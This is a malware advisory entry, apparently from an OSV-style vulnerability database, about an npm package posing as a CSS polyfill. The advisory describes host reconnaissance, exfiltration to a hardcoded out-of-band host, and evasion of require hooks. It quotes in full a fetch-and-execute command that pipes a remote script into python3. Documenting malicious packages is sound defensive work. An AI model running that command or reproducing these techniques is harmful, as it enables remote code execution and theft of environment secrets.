css-gwqyid-polyfill@1.0.0
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 8:28 PM UTC
OSV ID
MAL-2026-17574
Ecosystem
npm
Summary
thunderboltRegistry.js executes an IIFE on module load that collects host reconnaissance (id, whoami, full process environment via env, and ifconfig/ip addr output) and sends each result as a GET query-string to the hardcoded out-of-band host https://unl9pgk6ei4uf80n5tf4iktspjvbuzkn9.oastify.com/, keyed by os.hostname(). The same IIFE invokes execSync("curl -L https://appsecc.com/py | python3") to fetch and execute an opaque remote Python payload with the installer's privileges, tagging the output cmd=reverse-shell before exfiltrating it to the same oastify host. The payload deletes its own entries from require.cache and resolves child_process through three alternative paths (plain name, node: prefix, and a freshly constructed Module instance) to evade monkey-patched require hooks. The package's advertised identity as a CSS/Thunderbolt polyfill does not correspond to any code of that nature in the file and functions as a cover story for the recon, fetch-and-execute, and sandbox-evasion logic.
Source: amazon-inspector (3a81a389193175e49648e711d4eb83ebcbbd0b51e1b7a6677ceb338c3398dc19)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.